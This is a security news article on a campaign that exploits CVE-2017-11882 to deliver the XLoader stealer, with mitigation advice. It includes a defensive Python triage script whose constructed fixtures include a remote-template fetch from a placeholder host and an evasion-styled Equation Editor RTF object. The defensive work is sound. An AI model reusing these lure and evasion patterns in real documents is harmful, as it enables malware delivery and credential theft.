Cybercriminals Exploit Legacy Microsoft Office Vulnerability to Deploy XLoader Malware

In a recent wave of cyberattacks, threat actors have been exploiting a longstanding vulnerability in Microsoft Office’s Equation Editor to distribute the XLoader malware. This campaign underscores the persistent risks associated with unpatched software and the evolving tactics of cybercriminals.

Exploitation of CVE-2017-11882

The vulnerability in question, CVE-2017-11882, is a memory corruption flaw (a stack buffer overflow) in EQNEDT32.EXE, the legacy Equation Editor component that shipped with Microsoft Office. Microsoft patched it in November 2017. The flaw lets an attacker execute arbitrary code with the privileges of the logged-on user as soon as a specially crafted document is opened; no macros are involved, so policies that block macros do not stop it. Despite the age of the patch, many systems still run unpatched Office builds, which keeps the flaw viable.

Phishing Campaign Details

Attackers initiate their scheme by sending phishing emails that masquerade as purchase or order confirmations. These emails carry DOCX attachments that, when opened, fetch a malicious RTF file from an attacker-controlled server; it is that RTF, not the DOCX itself, that exploits CVE-2017-11882. Splitting the lure from the exploit in this way helps the attachment pass email scanning: the DOCX contains no exploit code, and the RTF is only retrieved once the document is opened on the victim's machine.

Technical Breakdown of the Attack Chain

1. Email Delivery: The victim receives a phishing email with a DOCX attachment, purportedly related to a legitimate transaction.

2. Document Execution: Upon opening the DOCX file, Word follows an external reference inside the document and retrieves the RTF file that carries the exploit.

3. Vulnerability Exploitation: The RTF file exploits the Equation Editor vulnerability, leading to the creation and execution of a Client.vbe file in the system’s temporary folder.

4. Malware Deployment: The Client.vbe script runs PowerShell commands that decode the XLoader payload and load it directly into memory. The final payload is never written to disk as a conventional executable, which evades antivirus products that rely on scanning files.
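The two document stages above (a DOCX that reaches out for a remote RTF, and an RTF that embeds an Equation Editor object) leave structural artefacts that a mail gateway or an analyst can check without detonating anything. The triage script below is an added example written for this page, not tooling from the campaign or from any vendor report. The documents it scans are constructed inline, the 198.51.100.10 address is a documentation-range placeholder, and the indicator names and the choice of watched relationship types are assumptions made for the example.

```python
"""Attachment triage for the two document stages in the described chain.

Hypothetical script (added example, not campaign or vendor tooling): flags a
DOCX whose package relationships point at a remote template or OLE object,
and an RTF that embeds an Equation Editor ("Equation.3") object.  Every
sample document below is constructed for the example.
"""
import io
import re
import uuid
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
# Relationship types Word resolves when the document opens.  An External
# attachedTemplate in word/_rels/settings.xml.rels is the remote template
# injection pattern; the set is the author's choice for this example.
WATCHED_REL_TYPES = {"attachedTemplate", "oleObject"}
# Equation Editor 3.0 CLSID, hex-encoded as it appears in an OLE stream.
EQNEDT_CLSID_HEX = uuid.UUID("0002CE02-0000-0000-C000-000000000046").bytes_le.hex().encode()


def _is_remote(target: str) -> bool:
    """http(s) URL or UNC path: content Word would fetch from another host."""
    return urlsplit(target).scheme in ("http", "https") or target.startswith("\\\\")


def docx_external_targets(data: bytes) -> list:
    """Every External relationship of a watched type, with a remote flag.
    A file:// attached template (a user's own .dotm) is reported but not
    flagged remote, which keeps ordinary documents out of the queue."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return []
    hits = []
    with zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                if rel.get("TargetMode") == "External" and rel_type in WATCHED_REL_TYPES:
                    target = rel.get("Target", "")
                    hits.append({"part": name, "type": rel_type,
                                 "target": target, "remote": _is_remote(target)})
    return hits


def _mixed_case_hex(text: str) -> bytes:
    """Regex for `text` hex-encoded with each letter in either case, so a
    case-mangled class name such as 'EqUaTiOn.3' inside \\objdata still hits."""
    alts = []
    for ch in text:
        variants = sorted({ch.lower(), ch.upper()})
        alts.append("(?:" + "|".join(f"{ord(v):02x}" for v in variants) + ")")
    return "".join(alts).encode()


RTF_CHECKS = [
    ("objclass-equation3", re.compile(rb"\\objclass\s*equation\.3", re.IGNORECASE)),
    ("objdata-equation3-classname", re.compile(_mixed_case_hex("Equation.3"), re.IGNORECASE)),
    ("objdata-eqnedt-clsid", re.compile(EQNEDT_CLSID_HEX, re.IGNORECASE)),
]


def rtf_equation_indicators(data: bytes) -> list:
    """Names of the indicators present in an RTF.  Whitespace is stripped
    first because attackers split the \\objdata hex across lines to defeat
    plain string matching."""
    if not data.lstrip().startswith(b"{\\rtf"):
        return []
    compact = re.sub(rb"\s+", b"", data)
    return [name for name, pattern in RTF_CHECKS if pattern.search(compact)]


def scan_attachment(data: bytes) -> dict:
    """Classify by content, never by extension: Word sniffs the file type,
    so an RTF delivered under a .docx name is still opened as RTF."""
    external = docx_external_targets(data)
    equation = rtf_equation_indicators(data)
    return {"external_targets": external, "equation_indicators": equation,
            "suspicious": any(h["remote"] for h in external) or bool(equation)}


def build_docx(settings_rels_xml: str) -> bytes:
    """Minimal DOCX-shaped zip (constructed) with one settings.xml.rels part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/settings.xml.rels", settings_rels_xml)
    return buf.getvalue()


ATTACHED_TEMPLATE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
# Constructed: remote template pointing at a documentation-range address.
REMOTE_TEMPLATE_RELS = (f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
                        'Target="http://198.51.100.10/order.rtf" TargetMode="External"/></Relationships>')
# Constructed: the benign case, a template on the local disk (also External).
LOCAL_TEMPLATE_RELS = (f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
                       'Target="file:///C:/Users/alice/Templates/Normal.dotm" TargetMode="External"/></Relationships>')
# Constructed RTF: case-mangled \objclass, OLE1 header (version, format 2,
# class-name length 11) then "eQuAtIoN.3\0" and the CLSID, hex split by spaces.
OBFUSCATED_RTF = (b"{\\rtf1\\ansi{\\object\\objemb{\\*\\objclass eQuAtIoN.3}"
                  b"{\\*\\objdata 0105000002000000\r\n0b000000 65 51 75 41 74 49 6f 4e 2e 33 00\r\n"
                  b"02ce0200 0000 0000 c000 0000 0000 0046 }}\\par }")
BENIGN_RTF = b"{\\rtf1\\ansi Purchase order 4471 attached.\\par }"

if __name__ == "__main__":
    for label, sample in [("remote-template.docx", build_docx(REMOTE_TEMPLATE_RELS)),
                          ("local-template.docx", build_docx(LOCAL_TEMPLATE_RELS)),
                          ("exploit.rtf", OBFUSCATED_RTF), ("benign.rtf", BENIGN_RTF)]:
        print(label, scan_attachment(sample))
```

The DOCX check parses the package relationships rather than grepping for "http", because the external reference lives in a `.rels` part and is only dangerous when its `TargetMode` is `External` and Word will actually resolve it; the local `Normal.dotm` case shows why the remote flag matters. The RTF check is deliberately tolerant of the two evasions seen in the wild against naive scanners, case-mangled class names and whitespace inside the hex stream; it is a triage signal, not proof of exploitation, and a genuine equation object in an old document will also trigger it.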

Role of HorusProtector

A notable aspect of this campaign is the use of HorusProtector, a commercially sold crypter that packs and obfuscates malware for delivery. Since its initial detection in 2024, HorusProtector has evolved: it now embeds the entire malware payload directly in the VBE file rather than retrieving it separately. That is why the dropper has grown from approximately 10KB to 1.34MB; the larger file is the price of a self-contained stage that needs no second download for defenders to observe or block.

XLoader Malware Capabilities

XLoader, the final payload in this attack chain, is a sophisticated information stealer that has evolved from the FormBook malware family. It is available as Malware-as-a-Service on underground forums and targets both Windows and macOS systems. Once installed, XLoader can:

– Record Keystrokes and Capture Screenshots: Monitoring user activity to gather sensitive information.

– Steal Clipboard Data: Including copied cryptocurrency wallet addresses and transaction details, posing a significant risk to users who trade or transfer digital currency.

– Extract Credentials: From web browsers, email clients, and messaging applications, facilitating unauthorized access to various accounts.

– Harvest Cryptocurrency Wallet Information: Enabling attackers to siphon funds directly from victims’ wallets.

– Download Additional Malware Payloads: Allowing for further compromise of the infected system.

Persistent Threat of Legacy Vulnerabilities

The continued exploitation of CVE-2017-11882 highlights a critical issue in cybersecurity: the enduring threat posed by unpatched vulnerabilities. Despite being identified and patched years ago, this flaw remains a favored target for cybercriminals because unpatched Office installations are still common. The component itself makes matters worse. The Equation Editor (EQNEDT32.EXE) is an out-of-process COM server: Word does not spawn it as a child process but activates it through DCOM, so it runs as a separate process that does not inherit the Office application's exploit mitigations, and endpoint detections that look only for suspicious children of winword.exe do not see the processes it launches. Microsoft removed the Equation Editor from Office entirely in the January 2018 updates, so an installation that still has the component is, by definition, years behind on patches.

Recommendations for Mitigation

To protect against such exploits, it is imperative for organizations and individuals to adopt comprehensive security measures:

1. Apply Security Patches Promptly: Ensure that all Microsoft Office installations are updated with the latest security patches to close known vulnerabilities.

2. Implement Email Filtering Solutions: Deploy advanced email filtering to detect and block phishing attempts and malicious attachments.

3. Disable Unnecessary Components: If the Equation Editor is not required, disable it. Microsoft's advisory for CVE-2017-11882 documents a registry workaround that sets the COM kill bit for the Equation Editor class (a Compatibility Flags DWORD value of 0x400 under HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}, and the equivalent WOW6432Node path on 64-bit Windows); applying the January 2018 Office updates, which removed the component, achieves the same result.

4. User Education: Conduct regular training sessions to educate users about the risks of opening unsolicited email attachments and the importance of verifying the authenticity of such communications.

5. Enable Advanced Security Features: Use Windows Defender Exploit Guard (now Microsoft Defender Exploit Guard), in particular its Attack Surface Reduction rules, to add a layer of protection that does not depend on recognising a specific exploit or payload.

Conclusion

The exploitation of the CVE-2017-11882 vulnerability to deploy XLoader malware serves as a stark reminder of the importance of maintaining up-to-date software and implementing robust security practices. Cybercriminals continue to leverage old vulnerabilities to execute sophisticated attacks, making it crucial for users to remain vigilant and proactive in their cybersecurity efforts.